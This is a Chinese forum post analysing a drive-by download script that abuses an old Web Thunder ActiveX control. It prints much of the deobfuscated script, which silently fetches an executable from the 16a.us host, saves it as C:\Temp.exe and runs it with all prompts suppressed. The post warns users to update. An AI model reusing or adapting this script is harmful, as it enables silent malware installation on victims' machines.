5月31日晚,我在霏凡样本区看到个毒网的帖子,又是最近臭名昭著的16a.us,不过发现这次居然有难得的新花样:
http://16a.us/oKK/oKKT.asp,加密方式不怎么样,其真面目(为防被利用,省略部分代码):
[Copy to clipboard]
CODE:
<script>window.onerror=function(){return true;}</script>
<SCRIPT>
var boH1 = null;
var OOwHUXqkg2 = 0;
function init()
{
try
{
boH1 = new ActiveXObject("ThunderServer.webThunder.1")
}
catch (e)
{
return 0
}
return 1
}
function downfile()
{
boH1["SetConfig"]("MessagePanel", "DownloadComplete", "0");
boH1["SetConfig"]("Sound", "DownloadComplete", "0");
boH1["ShowBrowserWindow"]();
var HwY_a3 = "http://16a.us/oKK/smss1.exe";
var V_WoijZC4 = "Temp.exe";
var TiVPJ5 = "c:\\";
var SRVntkDAp6 = "";
var dkisBy7 = "";
var zb8 = 1;
var asnF9 = 0;
var sXpsYU10 = 5;
var pYoldJ11 = 0;
var ZPuTA12 = "";
……(省略部分)
}
function open()
{
boH1["OpenFile"](OOwHUXqkg2);
boH1["DeleteTask"](OOwHUXqkg2, true);
}
function exec()
{
var cbEKfbd25 = init();
if (cbEKfbd25 == 0)
return;
OOwHUXqkg2 = downfile();
var aTzE26;
for (aTzE26 = 0; OOwHUXqkg2 == 1 && aTzE26 < 50; aTzE26++)
OOwHUXqkg2 = downfile();
if (OOwHUXqkg2 == 1)
return;
window["setTimeout"]("open()", 6000);
boH1["DeleteTask"](OOwHUXqkg2, del);
}
exec();
</SCRIPT>
我对这个懂得不多,但是大概看得出来,
调用web迅雷的ActiveX插件,下载http://16a.us/oKK/smss1.exe到本机保存为C:\Temp.exe并运行。与一般的下载不同的在于,脚本把web迅雷原本默认会弹出来的在这个过程中的所有提示全都设置为不提示,或者自动回应了提示,使得在这个过程中用户实际上不会在系统操作桌面上看到任何提示,也就达到了在用户完全不知情的情况下下载运行病毒的目的。
这显然是web迅雷的一个高度危险的漏洞。果然,之后有会员回帖证实了我的猜测,并转了DSWlab在5月30日(只在我发现之前一天)对此的描述:
http://www.dswlab.com/vir/v20070530.html
迅雷官方对此反应倒是十分迅速,马上升级了web迅雷,
新版本1.7.3.109已修复这个漏洞。在用web迅雷1.7.3.109以前版本,并仍想继续使用web迅雷的朋友,请立刻更新web迅雷版本到1.7.3.109版!
转自杭州志愿者
论坛
